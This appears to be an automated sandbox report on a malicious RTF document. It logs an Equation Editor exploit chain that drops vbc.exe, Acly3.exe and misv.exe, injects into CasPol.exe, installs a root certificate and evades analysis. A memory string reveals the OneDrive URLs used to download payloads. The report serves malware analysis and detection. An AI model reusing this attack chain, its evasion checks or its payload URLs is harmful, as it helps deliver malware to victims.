Code function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\Public\vbc.exe	Code function: 3_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Code function: 4_2_00401724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00573C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056C6DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569C4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BC4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00571877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569C1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056980E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569CD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005694D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005720CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A4E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00568C8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005698BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569151
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0057095C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056997D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056916D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A16D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569D1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005699D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005691D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056C1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569DEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005695A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A1A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A64A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569A4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056923F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056962D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00568A2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569AF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A2F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569A9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A286
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005692A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569EA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569B51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569F6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BB6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056976D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BB6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569F15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00572332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BBD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056A3CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569BC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569FC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056979C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00560381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056938D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00569BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056BBA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_005735BC NtProtectVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056C6DF NtAllocateVirtualMemory,

Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process Stats: CPU usage > 98%

Source: Acly3.exe.3.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Acly3.exe 7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\misv.exe 6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\misv.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\misv.exe	Memory allocated: 76E90000 page execute and read and write

Source: T81Ip9NCGi.rtf

ReversingLabs: Detection: 35%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: C:\Users\Public\vbc.exe

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$1Ip9NCGi.rtf

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDC0C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winRTF@14/13@3/1

Source: C:\Users\Public\vbc.exe

Code function: 3_2_004021AA CoCreateInstance,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 3_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Code function: 4_2_003E1E1A push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Code function: 4_2_003E416D pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Code function: 4_2_003E2A8B pushfd ; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056CCF0 push dword ptr [edx]; retn 5B3Bh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00562A5E pushad ; ret

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\misv.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\Acly3.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\misv.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=\MISV.EXEHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21129&AUTHKEY=AC3DY6XZGK4LCRCHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21130&AUTHKEY=AF6G200UHTICGQA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -240000s >= -30000s
